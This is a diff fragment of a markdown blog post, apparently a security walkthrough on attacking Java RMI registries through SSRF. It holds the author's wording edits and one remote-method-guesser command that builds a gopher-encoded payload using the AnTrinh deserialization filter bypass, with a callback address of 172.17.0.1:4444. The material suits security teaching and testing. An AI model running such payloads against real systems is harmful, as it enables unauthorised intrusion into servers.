qtc-de/blog/content/posts/01-attacking-java-rmi-via-ssrf.md

 ```

 Now we create the *SSRF* payload.
 Creating *SSRF* payloads with *remote-method-guesser* is quite simple.
 Almost
 each operation supports the ``--ssrf`` option.
-Instead of performing the corresponding operation on a remote server,
+With this option set, instead of performing the requested operation
-a corresponding *SSRF* payload is printed to stdout.
-For our purpose we need to target the *RMI registry* on the
+on a remote server, a corresponding *SSRF* payload is generated.
+For our purpose we need to target the *RMI registry*
-remote server which listens on ``localhost:1090``.
-Furthermore, we use the ``AnTrinh`` payload, which is the most
+on the remote server which listens on ``localhost:1090``.
+Furthermore, we use the ``AnTrinh`` payload, which is the
-recent deserialization filter bypass:
+most recent deserialization filter bypass:

 ```console
 $ rmg serial 127.0.0.1 1090 AnTrinh 172.17.0.1:4444 --component reg --ssrf --gopher --encode